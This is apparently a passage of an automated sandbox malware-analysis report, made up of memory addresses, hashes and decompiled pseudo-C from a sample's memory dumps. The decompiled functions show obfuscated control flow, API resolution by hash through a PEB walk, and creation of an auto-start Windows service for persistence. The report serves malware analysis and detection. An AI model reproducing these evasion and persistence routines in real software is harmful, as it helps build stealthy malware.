0x029c6c6e
0x029c6c6e
0x029c6f03
0x00000000
0x029c6c74
0x029c6c74
0x029c6c79
0x029c6cde
0x029c6ce3
0x00000000
0x029c6ce9
0x029c6ce9
0x029c6cee
0x00000000
0x029c6cee
0x029c6c7b
0x029c6c7b
0x029c6cc7
0x029c6ccc
0x029c6cce
0x00000000
0x029c6cd4
0x029c6cd4
0x00000000
0x029c6cd4
0x029c6c7d
0x029c6c7d
0x029c6c82
0x029c6c99
0x029c6cad
0x029c6cb1
0x029c6cb8
0x029c6cbd
0x029c6551
0x029c6551
0x029c6551
0x00000000
0x029c6556
0x029c6c84
0x029c6c84
0x029c6c89
0x00000000
0x029c6c8f
0x029c6c8f
0x00000000
0x029c6c8f
0x029c6c89
0x029c6c82
0x029c6c7b
0x029c6c79
0x029c6c6e
0x029c6883
0x029c6883
0x029c6c43
0x029c6c47
0x029c6c4b
0x029c6c52
0x029c6c59
0x00000000
0x029c6889
0x029c6889
0x029c688e
0x029c69e9
0x029c69ee
0x029c6a2e
0x029c6a33
0x00000000
0x029c6a35
0x029c6a35
0x029c6a3d
0x029c6a46
0x029c6a4a
0x029c6a57
0x029c6a5f
0x029c6a64
0x029c6a6c
0x029c6a79
0x029c6a7e
0x029c6a81
0x029c6a83
0x029c6b7a
0x029c6b80
0x029c6b87
0x029c6b8a
0x029c6b8f
0x029c6b8f
0x029c6b92
0x029c6b9a
0x029c6b9f
0x029c6ba7
0x029c6bac
0x029c6bb4
0x029c6bbc
0x029c6bc1
0x029c6bc5
0x029c6bfc
0x029c6bfc
0x029c6bc7
0x029c6bd6
0x029c6bdb
0x029c6bde
0x029c6be2
0x029c6be9
0x029c6bf2
0x029c6bf6
0x029c6bf8
0x029c6bf8
0x029c6bfe
0x029c6c04
0x029c6c06
0x029c6c0d
0x029c6c12
0x029c6c17
0x029c6c1e
0x029c6c20
0x029c6c20
0x029c6c26
0x029c6c2e
0x029c6c32
0x029c6c34
0x029c6c36
0x029c6c3b
0x029c6a89
0x029c6a89
0x029c6a91
0x029c6a96
0x029c6aa1
0x029c6aa4
0x029c6aa8
0x029c6ab0
0x029c6ab8
0x029c6ac0
0x029c6ac8
0x029c6acd
0x029c6ad9
0x029c6add
0x029c6b14
0x029c6b14
0x029c6adf
0x029c6aee
0x029c6af3
0x029c6af6
0x029c6afa
0x029c6b01
0x029c6b0a
0x029c6b0e
0x029c6b10
0x029c6b10
0x029c6b16
0x029c6b1b
0x029c6b1d
0x029c6b24
0x029c6b29
0x029c6b2e
0x029c6b30
0x029c6b35
0x029c6b35
0x029c6b3a
0x029c6b42
0x029c6b4a
0x029c6b52
0x029c6b57
0x029c6b5f
0x029c6b63
0x029c6b6b
0x029c6b6d
0x029c6b72
0x029c6b72
0x029c6551
0x029c6551
0x029c6551
0x00000000
0x029c6551
0x029c6551
0x029c69f0
0x029c69f0
0x029c6f02
0x029c69f6
0x029c69f6
0x029c69fb
0x029c6a17
0x029c6a1c
0x029c6a1e
0x00000000
0x029c6a24
0x029c6a24
0x00000000
0x029c6a24
0x029c69fd
0x029c69fd
0x029c6a02
0x00000000
0x029c6a04
0x029c6a09
0x029c6a0d
0x00000000
0x029c6a0d
0x029c6a02
0x029c69fb
0x029c69f0
0x029c6894
0x029c6894
0x029c69d1
0x029c69d8
0x029c69df
0x00000000
0x029c689a
0x029c689a
0x029c689f
0x029c68e6
0x029c68eb
0x00000000
0x029c68f1
0x029c68f3
0x029c68f5
0x029c69bc
0x029c69bc
0x00000000
0x029c68fb
0x029c68fb
0x029c6903
0x029c6908
0x029c6910
0x029c6918
0x029c691d
0x029c6921
0x029c6959
0x029c6959
0x029c6923
0x029c6932
0x029c6937
0x029c693a
0x029c693e
0x029c6950
0x029c6952
0x029c6952
0x029c695b
0x029c6963
0x029c6968
0x029c6970
0x029c697c
0x029c697e
0x029c6983
0x029c6985
0x029c6996
0x029c699b
0x029c69a0
0x029c69a5
0x029c69a8
0x029c69aa
0x029c69ac
0x00000000
0x029c69b2
0x029c69b2
0x00000000
0x029c69b4
0x029c69b4
0x029c69b6
0x00000000
0x00000000
0x00000000
0x00000000
0x029c69b6
0x029c69b2
0x00000000
0x00000000
0x00000000
0x029c6985
0x029c68f5
0x029c68a1
0x029c68a1
0x029c68d7
0x029c68dc
0x00000000
0x029c68a3
0x029c68a3
0x029c68a8
0x029c68c9
0x029c68cd
0x00000000
0x029c68aa
0x029c68aa
0x029c68af
0x00000000
0x029c68b5
0x029c68b5
0x029c68ba
0x00000000
0x029c68ba
0x029c68af
0x029c68a8
0x029c68a1
0x029c689f
0x029c6894
0x029c688e
0x029c6883
0x00000000
0x029c687d
0x029c69be
0x029c69be
0x029c69d0
0x00000000
0x029c69d0

Strings

l!`u, xrefs: 029C6DF3
ke@5, xrefs: 029C6D6F
W$, xrefs: 029C6AA8
ke@5, xrefs: 029C6D01

Memory Dump Source

Source File: 00000000.00000002.249838612.00000000029C1000.00000020.00000001.sdmp, Offset: 029C0000, based on PE: true

Associated: 00000000.00000002.249823573.00000000029C0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249848856.00000000029CD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249854417.00000000029D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29c0000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID:
String ID: W$$ke@5$ke@5$l!`u
API String ID: 0-26469448
Opcode ID: 6e2b06b87a673887f4e8b09d7357831dbb73a565448d7bd74ec02156c003a31c
Instruction ID: 332b677cda8727bb8e5ccb8f7c46fa4ca620fd71b3111a1af2fbc76e1fe0c00b
Opcode Fuzzy Hash: 6e2b06b87a673887f4e8b09d7357831dbb73a565448d7bd74ec02156c003a31c
Instruction Fuzzy Hash: E022C6B1A093028BC728EE68D54412EB6EEABD0744F744D2EE586D7354EB30DD49CB93

Uniqueness

Uniqueness Score: -1.00%

Function 029080CE, Relevance: 5.6, Strings: 4, Instructions: 596COMMON

Download Yara Rule

Strings

ke@5, xrefs: 0290890D
l!`u, xrefs: 02908991
W$, xrefs: 02908646
ke@5, xrefs: 0290889F

Memory Dump Source

Source File: 00000000.00000002.249411331.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID:
String ID: W$$ke@5$ke@5$l!`u
API String ID: 0-26469448
Opcode ID: 2884b0bae5a6a19bce542e2dc18d18ab15a0ccbe2a39f1a83be921a77ecd1377
Instruction ID: 91e7ce6103b50cef8ba2b27465feb82dad7c59af128c1d822f947862c81f45d9
Opcode Fuzzy Hash: 2884b0bae5a6a19bce542e2dc18d18ab15a0ccbe2a39f1a83be921a77ecd1377
Instruction Fuzzy Hash: D922AC71B0930A8FC764EE68D5C452EB6E6BBC0744F14492EE486DB2E1DB20CD49CB97

Uniqueness

Uniqueness Score: -1.00%

Function 029C5070, Relevance: 5.2, Strings: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E029C5070(intOrPtr __ecx, intOrPtr* __edx) {
				char _v4;
				char _v8;
				intOrPtr* _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v36;
				intOrPtr _v44;
				signed int _v56;
				intOrPtr _v68;
				void* __ebx;
				void* __ebp;
				intOrPtr _t16;
				intOrPtr* _t17;
				intOrPtr* _t19;
				intOrPtr* _t23;
				intOrPtr* _t26;
				intOrPtr* _t29;
				intOrPtr* _t30;
				intOrPtr* _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;
				intOrPtr* _t38;
				signed int _t39;
				intOrPtr* _t47;
				intOrPtr* _t80;
				void* _t82;
				signed int _t83;
				void* _t84;
				intOrPtr* _t89;
				void* _t92;
				void* _t93;

				_v12 = __edx;
				_t47 = 0;
				_t80 = _v12;
				_t89 = 0;
				_v20 = __ecx;
				_t83 = 0x200c4c64;
				while(1) {
					_t16 = _v28;
					while(1) {
						L2:
						_t92 = _t83 - 0x200c4c64;
						if(_t92 > 0) {
							break;
						}
						if(_t92 == 0) {
							_t83 = 0xbb9a688;
							continue;
						} else {
							_t93 = _t83 - 0xc62322e;
							if(_t93 > 0) {
								__eflags = _t83 - 0xd366d74;
								if(_t83 == 0xd366d74) {
									_t80 = _t80 + 0x2c;
									__eflags = _t80 - _t16;
									asm("sbb esi, esi");
									_t83 = (_t83 & 0x1131a8a6) + 0x18b16b79;
									continue;
								} else {
									__eflags = _t83 - 0x18b16b79;
									if(_t83 != 0x18b16b79) {
										goto L39;
									} else {
										E029C4250(_t47, _t89);
										_t83 = 0x34957300;
										while(1) {
											_t16 = _v28;
											goto L2;
										}
									}
								}
							} else {
								if(_t93 == 0) {
									_t36 =  *0x29cdb9c;
									__eflags = _t36;
									if(_t36 == 0) {
										_t36 = E029C3E80(_t47, E029C3F20(0x667fdee), 0x72841a68, _t89);
										 *0x29cdb9c = _t36;
									}
									_t37 =  *_t36(_v20, 0, 0x30, 3, _t47, 0x20000,  &_v8,  &_v16, 0, 0);
									__eflags = _t37;
									if(_t37 == 0) {
										L29:
										_t83 = 0x18b16b79;
										while(1) {
											_t16 = _v28;
											goto L2;
										}
									} else {
										_t38 =  *0x29cdd4c;
										__eflags = _t38;
										if(_t38 == 0) {
											_t38 = E029C3E80(_t47, E029C3F20(0xbb398380), 0xae3c1a47, _t89);
											 *0x29cdd4c = _t38;
										}
										_t39 =  *_t38();
										_t83 = 0x29e3141f;
										_t82 = (_t39 & 0x0000001f) * 0x2c + _t47;
										_t16 = _v56 * 0x2c + _t47;
										__eflags = _t82 - _t16;
										_v68 = _t16;
										_t80 =  >=  ? _t47 : _t82;
										continue;
									}
									L47:
								} else {
									if(_t83 == 0xc9d2df) {
										_t89 = E029C42F0(_t47, 0x2000);
										__eflags = _t89;
										_t83 =  !=  ? 0xc62322e : 0x34957300;
										while(1) {
											_t16 = _v28;
											goto L2;
										}
									} else {
										if(_t83 != 0xbb9a688) {
											L39:
											__eflags = _t83 - 0x230370fe;
											if(_t83 != 0x230370fe) {
												while(1) {
													_t16 = _v28;
													goto L2;
												}
											}
										} else {
											_t16 = E029C42F0(_t47, 0x20000);
											_t47 = _t16;
											if(_t47 != 0) {
												_t83 = 0xc9d2df;
												while(1) {
													_t16 = _v28;
													goto L2;
												}
											}
										}
									}
								}
							}
						}
						L46:
						return _t16;
						goto L47;
					}
					__eflags = _t83 - 0x3024435d;
					if(__eflags > 0) {
						__eflags = _t83 - 0x34957300;
						if(_t83 == 0x34957300) {
							_t17 =  *0x29cdea8;
							__eflags = _t17;
							if(_t17 == 0) {
								_t17 = E029C3E80(_t47, E029C3F20(0xbb398380), 0x97f883e, _t89);
								 *0x29cdea8 = _t17;
							}
							_t84 =  *_t17();
							_t19 =  *0x29ce1a0;
							__eflags = _t19;
							if(_t19 == 0) {
								_t19 = E029C3E80(_t47, E029C3F20(0xbb398380), 0x26c3f343, _t89);
								 *0x29ce1a0 = _t19;
							}
							return  *_t19(_t84, 0, _t47);
						}
						goto L39;
					} else {
						if(__eflags == 0) {
							_t23 =  *0x29cdd1c;
							__eflags = _t23;
							if(_t23 == 0) {
								_t23 = E029C3E80(_t47, E029C3F20(0x667fdee), 0xe8428d8f, _t89);
								 *0x29cdd1c = _t23;
							}
							 *_t23(_v24, 1, _t89, 0x2000,  &_v4);
							asm("sbb esi, esi");
							_t26 =  *0x29cddb8;
							_t83 = (_t83 & 0x1dde7ce2) + 0xd366d74;
							__eflags = _t26;
							if(_t26 == 0) {
								_t26 = E029C3E80(_t47, E029C3F20(0x667fdee), 0x505cb3fe, _t89);
								 *0x29cddb8 = _t26;
							}
							_t16 =  *_t26(_v44);
							goto L39;
						} else {
							__eflags = _t83 - 0x29e3141f;
							if(_t83 == 0x29e3141f) {
								_t29 =  *0x29cdab4;
								__eflags = _t29;
								if(_t29 == 0) {
									_t29 = E029C3E80(_t47, E029C3F20(0x667fdee), 0x203166f7, _t89);
									 *0x29cdab4 = _t29;
								}
								_t30 =  *_t29(_v20,  *_t80, 1);
								__eflags = _t30;
								_v36 = _t30;
								_t83 =  !=  ? 0x3024435d : 0xd366d74;
								continue;
							} else {
								__eflags = _t83 - 0x2b14ea56;
								if(_t83 != 0x2b14ea56) {
									goto L39;
								} else {
									_t33 =  *0x29cdcf0;
									__eflags = _t33;
									if(_t33 == 0) {
										_t33 = E029C3E80(_t47, E029C3F20(0x667fdee), 0x60075e37, _t89);
										 *0x29cdcf0 = _t33;
									}
									 *_t33(_v12, 1, _t89);
									goto L29;
								}
							}
						}
					}
					goto L46;
				}
			}

0x029c5076
0x029c507a
0x029c507d
0x029c5081
0x029c5083
0x029c5087
0x029c508c
0x029c508c
0x029c5090
0x029c5090
0x029c5090
0x029c5096
0x00000000
0x00000000
0x029c509c
0x029c51cd
0x00000000
0x029c50a2
0x029c50a2
0x029c50a8
0x029c5190
0x029c5196
0x029c51b5
0x029c51b8
0x029c51ba
0x029c51c2
0x00000000
0x029c5198
0x029c5198
0x029c519e
0x00000000
0x029c51a4
0x029c51a6
0x029c51ab
0x029c508c
0x029c508c
0x00000000
0x029c508c
0x029c508c
0x029c519e
0x029c50ae
0x029c50ae
0x029c50fc
0x029c5101
0x029c5103
0x029c5116
0x029c511b
0x029c511b
0x029c513e
0x029c5140
0x029c5142
0x029c522a
0x029c522a
0x029c508c
0x029c508c
0x00000000
0x029c508c
0x029c5148
0x029c5148
0x029c514d
0x029c514f
0x029c5162
0x029c5167
0x029c5167
0x029c516c
0x029c5171
0x029c517e
0x029c5180
0x029c5182
0x029c5184
0x029c5188
0x00000000
0x029c5188
0x00000000
0x029c50b0
0x029c50b6
0x029c50e9
0x029c50f0
0x029c50f7
0x029c508c
0x029c508c
0x00000000
0x029c508c
0x029c50b8
0x029c50be
0x029c52f5
0x029c52f5
0x029c52fb
0x029c508c
0x029c508c
0x00000000
0x029c508c
0x029c508c
0x029c50c4
0x029c50c9
0x029c50ce
0x029c50d2
0x029c50d8
0x029c508c
0x029c508c
0x00000000
0x029c508c
0x029c508c
0x029c50d2
0x029c50be
0x029c50b6
0x029c50ae
0x029c50a8
0x029c535b
0x029c535b
0x00000000
0x029c535b
0x029c51d7
0x029c51dd
0x029c52ed
0x029c52f3
0x029c5302
0x029c5307
0x029c5309
0x029c531c
0x029c5321
0x029c5321
0x029c5328
0x029c532a
0x029c532f
0x029c5331
0x029c5344
0x029c5349
0x029c5349
0x00000000
0x029c5352
0x00000000
0x029c51e3
0x029c51e3
0x029c527a
0x029c527f
0x029c5281
0x029c5294
0x029c5299
0x029c5299
0x029c52af
0x029c52b3
0x029c52b5
0x029c52c0
0x029c52c6
0x029c52c8
0x029c52db
0x029c52e0
0x029c52e0
0x029c52e9
0x00000000
0x029c51e9
0x029c51e9
0x029c51ef
0x029c5234
0x029c5239
0x029c523b
0x029c524e
0x029c5253
0x029c5253
0x029c5260
0x029c5262
0x029c5264
0x029c5272
0x00000000
0x029c51f1
0x029c51f1
0x029c51f7
0x00000000
0x029c51fd
0x029c51fd
0x029c5202
0x029c5204
0x029c5217
0x029c521c
0x029c521c
0x029c5228
0x00000000
0x029c5228
0x029c51f7
0x029c51ef
0x029c51e3
0x00000000
0x029c51dd

Strings

]C$0, xrefs: 029C51D7
]C$0, xrefs: 029C526D
tm6, xrefs: 029C5268
tm6, xrefs: 029C5190

Memory Dump Source

Source File: 00000000.00000002.249838612.00000000029C1000.00000020.00000001.sdmp, Offset: 029C0000, based on PE: true

Associated: 00000000.00000002.249823573.00000000029C0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249848856.00000000029CD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249854417.00000000029D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29c0000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID:
String ID: ]C$0$]C$0$tm6$tm6
API String ID: 0-1577568632
Opcode ID: 33a3bef7fc86e73335730fa2802c580c74abca785b75757bd31732fc8d77df57
Instruction ID: 137602983b1f2a5df6263f94ec3f0bfcc29debe20799b61a4a4a04176d966e96
Opcode Fuzzy Hash: 33a3bef7fc86e73335730fa2802c580c74abca785b75757bd31732fc8d77df57
Instruction Fuzzy Hash: 6A613F32F043119BDB14AB79A89077E72EA9BC4754FB6497CE805FB244EA60EC0087D7

Uniqueness

Uniqueness Score: -1.00%

Function 029C87D0, Relevance: 3.9, Strings: 3, Instructions: 164
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E029C87D0() {
				char _v520;
				intOrPtr* _v524;
				intOrPtr _v576;
				void* __ebx;
				void* __ebp;
				void* _t11;
				intOrPtr* _t12;
				intOrPtr* _t16;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t40;
				intOrPtr* _t53;
				intOrPtr _t58;
				void* _t59;
				intOrPtr _t60;
				short* _t62;
				intOrPtr* _t63;
				void* _t64;
				void* _t66;
				void* _t67;

				_t64 =  &_v524;
				_t58 = 0;
				_t11 = 0x388705c7;
				_v524 = 0;
				_t63 = _v524;
				_t35 = _v524;
				_t60 = _v524;
				while(1) {
					_t66 = _t11 - 0x2793b377;
					if(_t66 > 0) {
						goto L21;
					}
					L2:
					if(_t66 == 0) {
						E029C5070(_t35, _t63);
						_t11 = 0x93584cb;
						continue;
					} else {
						_t67 = _t11 - 0x124353fe;
						if(_t67 > 0) {
							if(_t11 == 0x2169f629) {
								_t21 =  *0x29cddb8;
								if(_t21 == 0) {
									_t21 = E029C3E80(_t35, E029C3F20(0x667fdee), 0x505cb3fe, _t63);
									 *0x29cddb8 = _t21;
								}
								 *_t21(_t35);
								L36:
								return _t58;
							} else {
								goto L18;
							}
						} else {
							if(_t67 == 0) {
								_t24 = E029C34C0(0x29cd8f0);
								_t53 =  *0x29cdc60;
								_t59 = _t24;
								if(_t53 == 0) {
									_t53 = E029C3E80(_t35, E029C3F20(0xe66945e6), 0xcca28b0d, _t63);
									 *0x29cdc60 = _t53;
								}
								_t40 =  *0x29ce2ec;
								 *_t53( &_v520, 0x104, _t59, _t40 + 0x5c, _t40 + 0x278);
								_t64 = _t64 + 0x14;
								E029C3460(_t59);
								_t58 = _v524;
								_t11 = 0x3acbd78;
								continue;
							} else {
								if(_t11 == 0x3acbd78) {
									_t62 =  *0x29ce2ec + 0x278;
									while( *_t62 != 0x5c) {
										_t62 = _t62 + 2;
									}
									_t60 = _t62 + 2;
									_t11 = 0x2d3078b2;
									continue;
								} else {
									if(_t11 == 0x93584cb) {
										_t32 =  *0x29cddb8;
										if(_t32 == 0) {
											_t32 = E029C3E80(_t35, E029C3F20(0x667fdee), 0x505cb3fe, _t63);
											 *0x29cddb8 = _t32;
										}
										 *_t32(_t63);
										L10:
										_t11 = 0x2169f629;
										continue;
										do {
											while(1) {
												_t66 = _t11 - 0x2793b377;
												if(_t66 > 0) {
													goto L21;
												}
												goto L2;
											}
											goto L21;
										} while (_t11 != 0x33cd76b6);
										return _t58;
									}
								}
							}
						}
					}
					L37:
					L21:
					if(_t11 == 0x2d3078b2) {
						_t12 =  *0x29ce0f4;
						if(_t12 == 0) {
							_t12 = E029C3E80(_t35, E029C3F20(0x667fdee), 0x7f692adf, _t63);
							 *0x29ce0f4 = _t12;
						}
						_t35 =  *_t12(0, 0, 0xf003f);
						if(_t35 == 0) {
							goto L36;
						} else {
							_t11 = 0x34ee6736;
							continue;
						}
					} else {
						if(_t11 == 0x34ee6736) {
							_t16 =  *0x29cdb50;
							if(_t16 == 0) {
								_t16 = E029C3E80(_t35, E029C3F20(0x667fdee), 0xc2730d45, _t63);
								 *0x29cdb50 = _t16;
							}
							_t63 =  *_t16(_t35, _t60, _t60, 2, 0x10, 2, 0,  &_v520, 0, 0, 0, 0, 0);
							if(_t63 == 0) {
								goto L10;
							} else {
								_t58 = 1;
								_t11 = 0x2793b377;
								_v576 = 1;
							}
							continue;
						} else {
							if(_t11 != 0x388705c7) {
								goto L18;
							} else {
								_t11 = 0x124353fe;
								continue;
							}
						}
					}
					goto L37;
				}
			}

0x029c87d0
0x029c87da
0x029c87dc
0x029c87e1
0x029c87e5
0x029c87e9
0x029c87ed
0x029c87f1
0x029c87f1
0x029c87f6
0x00000000
0x00000000
0x029c87fc
0x029c87fc
0x029c8908
0x029c890d
0x00000000
0x029c8802
0x029c8802
0x029c8807
0x029c88e6
0x029c89d2
0x029c89d9
0x029c89ec
0x029c89f1
0x029c89f1
0x029c89f7
0x029c89f9
0x029c8a05
0x00000000
0x00000000
0x00000000
0x029c880d
0x029c880d
0x029c887c
0x029c8881
0x029c8887
0x029c888b
0x029c88a3
0x029c88a5
0x029c88a5
0x029c88ab
0x029c88c7
0x029c88c9
0x029c88ce
0x029c88d3
0x029c88d7
0x00000000
0x029c880f
0x029c8814
0x029c8855
0x029c885f
0x029c8861
0x029c8864
0x029c886a
0x029c886d
0x00000000
0x029c8816
0x029c881b
0x029c8821
0x029c8828
0x029c883b
0x029c8840
0x029c8840
0x029c8846
0x029c8848
0x029c8848
0x029c884d
0x029c87f1
0x029c87f1
0x029c87f1
0x029c87f6
0x00000000
0x00000000
0x00000000
0x029c87f6
0x00000000
0x029c87f1
0x029c8903
0x029c8903
0x029c881b
0x029c8814
0x029c880d
0x029c8807
0x00000000
0x029c8917
0x029c891c
0x029c8993
0x029c899a
0x029c89ad
0x029c89b2
0x029c89b2
0x029c89c2
0x029c89c6
0x00000000
0x029c89c8
0x029c89c8
0x00000000
0x029c89c8
0x029c891e
0x029c8923
0x029c8936
0x029c893d
0x029c8950
0x029c8955
0x029c8955
0x029c8976
0x029c897a
0x00000000
0x029c8980
0x029c8980
0x029c8985
0x029c898a
0x029c898a
0x00000000
0x029c8925
0x029c892a
0x00000000
0x029c892c
0x029c892c
0x00000000
0x029c892c
0x029c892a
0x029c8923
0x00000000
0x029c891c

Strings

Ei, xrefs: 029C888D
6g4, xrefs: 029C89C8
6g4, xrefs: 029C891E

Memory Dump Source

Source File: 00000000.00000002.249838612.00000000029C1000.00000020.00000001.sdmp, Offset: 029C0000, based on PE: true

Associated: 00000000.00000002.249823573.00000000029C0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249848856.00000000029CD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249854417.00000000029D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29c0000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID:
String ID: 6g4$6g4$Ei
API String ID: 0-2833161213
Opcode ID: 65e1ec54df5f95de10838ad99e3718e2a1c5f3e8dd57bbdbfb973ced524d375b
Instruction ID: f8966578822b273d01e03e88e048ced522e3a57a5baf76a97305ac9b45018461
Opcode Fuzzy Hash: 65e1ec54df5f95de10838ad99e3718e2a1c5f3e8dd57bbdbfb973ced524d375b
Instruction Fuzzy Hash: 62512675B4834197D726EA699854B7B339ABBC4304F34093DF916DB680EB20CC4187A7

Uniqueness

Uniqueness Score: -1.00%

Function 029C3F20, Relevance: 2.6, Strings: 2, Instructions: 96
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E029C3F20(intOrPtr __ecx) {
				signed int _t93;
				signed int _t97;
				intOrPtr* _t100;
				signed short* _t103;
				signed int _t108;
				signed int _t113;
				intOrPtr* _t115;
				void* _t118;

				 *((intOrPtr*)(_t118 + 0xc)) = __ecx;
				_t100 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc;
				 *((intOrPtr*)(_t118 + 0x18)) = _t100;
				_t115 =  *_t100;
				if(_t115 == _t100) {
					L10:
					return 0;
				} else {
					do {
						_t103 =  *(_t115 + 0x30);
						 *(_t118 + 0x14) = 0x9c4e;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0x4464;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) >> 1;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0xffff87db;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0xffff18d7;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0xffff529c;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0xffff507b;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) | 0x3b9f69dc;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) ^ 0xfffffdfe;
						 *(_t118 + 0x10) = 0x31f8;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) * 0x75;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x67893507;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x679fe359;
						 *(_t118 + 0x10) = 0x4955;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xa8908194;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) >> 8;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xffffdf1d;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xfffff42f;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) | 0x02e6e862;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xa6c2;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xe36c9a70;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xe1830958;
						if( *_t103 != 0) {
							do {
								_t97 =  *(_t118 + 0x14);
								 *(_t118 + 0x10) = 0x31f8;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) * 0x75;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x67893507;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x679fe359;
								 *(_t118 + 0x10) = 0x4955;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xa8908194;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) >> 8;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xffffdf1d;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xfffff42f;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) | 0x02e6e862;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xa6c2;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xe36c9a70;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xe1830958;
								_t113 =  *(_t118 + 0x14) << ( *(_t118 + 0x10) & 0x000000ff);
								_t93 =  *_t103 & 0x0000ffff;
								_t108 =  *(_t118 + 0x14) << ( *(_t118 + 0x10) & 0x000000ff);
								if(_t93 >= 0x41 && _t93 <= 0x5a) {
									_t93 = _t93 + 0x20;
								}
								 *(_t118 + 0x14) = _t93;
								_t103 =  &(_t103[1]);
								 *(_t118 + 0x14) =  *(_t118 + 0x14) + _t113;
								 *(_t118 + 0x14) =  *(_t118 + 0x14) + _t108;
								 *(_t118 + 0x14) =  *(_t118 + 0x14) - _t97;
							} while ( *_t103 != 0);
							_t100 =  *((intOrPtr*)(_t118 + 0x18));
						}
						if(( *(_t118 + 0x14) ^ 0x344765f2) ==  *((intOrPtr*)(_t118 + 0x1c))) {
							return  *((intOrPtr*)(_t115 + 0x18));
						} else {
							goto L9;
						}
						goto L12;
						L9:
						_t115 =  *_t115;
					} while (_t115 != _t100);
					goto L10;
				}
				L12:
			}

0x029c3f29
0x029c3f32
0x029c3f37
0x029c3f3b
0x029c3f3f
0x029c40cb
0x029c40d4
0x029c3f45
0x029c3f45
0x029c3f45
0x029c3f48
0x029c3f50
0x029c3f58
0x029c3f5c
0x029c3f64
0x029c3f6c
0x029c3f74
0x029c3f7c
0x029c3f84
0x029c3f8c
0x029c3f99
0x029c3f9d
0x029c3fa5
0x029c3fad
0x029c3fb5
0x029c3fbd
0x029c3fc2
0x029c3fca
0x029c3fd2
0x029c3fda
0x029c3fe2
0x029c3fea
0x029c3ff6
0x029c4000
0x029c4000
0x029c4004
0x029c4011
0x029c4015
0x029c401d
0x029c402e
0x029c4036
0x029c403e
0x029c4043
0x029c404b
0x029c4053
0x029c405b
0x029c4063
0x029c406b
0x029c4073
0x029c407e
0x029c4081
0x029c4086
0x029c408d
0x029c408d
0x029c4090
0x029c4094
0x029c4097
0x029c409b
0x029c409f
0x029c40a3
0x029c40ad
0x029c40ad
0x029c40be
0x029c40df
0x00000000
0x00000000
0x00000000
0x00000000
0x029c40c0
0x029c40c0
0x029c40c3
0x00000000
0x029c3f45
0x00000000

Strings

dD, xrefs: 029C3F50
UI, xrefs: 029C402E

Memory Dump Source

Source File: 00000000.00000002.249838612.00000000029C1000.00000020.00000001.sdmp, Offset: 029C0000, based on PE: true

Associated: 00000000.00000002.249823573.00000000029C0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249848856.00000000029CD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249854417.00000000029D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29c0000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID:
String ID: UI$dD
API String ID: 0-2678678791
Opcode ID: 5b0b6e09fcfe7a652f9b1521d2d76371d588ae290acbf1882c862c8981155b4e
Instruction ID: de2daa60ee418c1bd12b87ad7d55b537eaca3d462fd9ae1eff99f4ed4c789ed8
Opcode Fuzzy Hash: 5b0b6e09fcfe7a652f9b1521d2d76371d588ae290acbf1882c862c8981155b4e
Instruction Fuzzy Hash: A241E2B65083838BD394CF28E54651BBBF0FB90724F440E5DE4A1962A0D3B9DA4DCB93

Uniqueness

Uniqueness Score: -1.00%

Function 02905ABE, Relevance: 2.6, Strings: 2, Instructions: 96COMMON

Download Yara Rule

Strings

